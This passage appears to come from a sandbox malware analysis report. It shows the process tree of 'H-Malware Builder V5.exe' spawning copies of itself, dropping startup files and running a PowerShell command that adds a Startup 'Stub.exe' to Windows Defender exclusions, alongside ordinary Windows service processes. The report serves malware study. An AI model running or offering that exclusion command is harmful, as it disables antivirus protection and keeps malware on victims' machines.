                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      16⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:3620
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                    15⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Drops startup file
                                                                                                                    PID:2348
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                      16⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:4484
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        17⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:1980
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                      16⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops startup file
                                                                                                                      PID:4312
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                        17⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:540
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                        17⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Drops startup file
                                                                                                                        PID:116
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                          18⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:1376
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            19⤵
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:1824
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                          18⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          PID:4652
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                            19⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:5032
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              20⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:4092
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                            19⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Drops startup file
                                                                                                                            PID:2332
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                              20⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:1928
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                21⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:2968
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                              20⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Drops startup file
                                                                                                                              PID:4024
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                21⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:4800
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  22⤵
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:1484
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                21⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Drops startup file
                                                                                                                                PID:3492
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                  22⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:1828
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    23⤵
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4420
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                  22⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  PID:1116
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                    23⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:2548
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      24⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:4436
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                    23⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Drops startup file
                                                                                                                                    PID:4000
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                      24⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:4300
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        25⤵
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:3088
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                      24⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Drops startup file
                                                                                                                                      PID:4372
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                        25⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:1932
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          26⤵
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:576
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                        25⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:1588
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                          26⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:4448
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            27⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:1120
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                          26⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          PID:3892
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                            27⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:3992
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              28⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:2896
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                            27⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Drops startup file
                                                                                                                                            PID:1704
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                              28⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:2980
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                29⤵
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2660
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                              28⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Drops startup file
                                                                                                                                              PID:2164
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                29⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:3760
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  30⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:5060
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                29⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Drops startup file
                                                                                                                                                PID:1504
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                  30⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:4480
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    31⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2536
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                  30⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Drops startup file
                                                                                                                                                  PID:2108
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                    31⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:1216
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      32⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:724
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                    31⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Drops startup file
                                                                                                                                                    PID:4012
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                      32⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:4504
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        33⤵
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:1584
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                      32⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Drops startup file
                                                                                                                                                      PID:4696
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                        33⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:1104
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          34⤵
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:1704
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                        33⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Drops startup file
                                                                                                                                                        PID:4896
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                          34⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:3768
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            35⤵
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:4796
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                          34⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          PID:2580
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                            35⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4756
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              36⤵
                                                                                                                                                                PID:1092
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                              35⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Drops startup file
                                                                                                                                                              PID:1316
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                36⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:2396
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  37⤵
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:376
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                36⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:1876
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                  37⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:3228
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    38⤵
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:1580
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                  37⤵
                                                                                                                                                                    PID:1832
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                      38⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:5068
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                      38⤵
                                                                                                                                                                        PID:2468
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                          39⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:4652
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                          39⤵
                                                                                                                                                                            PID:3160
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                              40⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:1300
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                              40⤵
                                                                                                                                                                                PID:3188
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                  1⤵
                                                                                                    PID:3516
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3676
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3968
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4104
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:4332
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:4444
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:2040
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:3484
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:1724
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:2312
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2404
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:3904
                                                                                                                  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                    1⤵
                                                                                                                      PID:1388
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                      1⤵
                                                                                                                        PID:3728
                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:5036
                                                                                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                          C:\Windows\System32\WaaSMedicAgent.exe 7c804f81441bda6137def3414eab22e7 0b4oqamxfUibqFoAiPHxKw.0.1.0.0.0
                                                                                                                          1⤵
                                                                                                                          • Sets service image path in registry
                                                                                                                          PID:1200
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            2⤵
                                                                                                                              PID:1316
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                            1⤵
                                                                                                                              PID:4684
                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:1876
                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              1⤵
                                                                                                                                PID:3452
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                1⤵
                                                                                                                                  PID:3152
                                                                                                                                • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4784

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

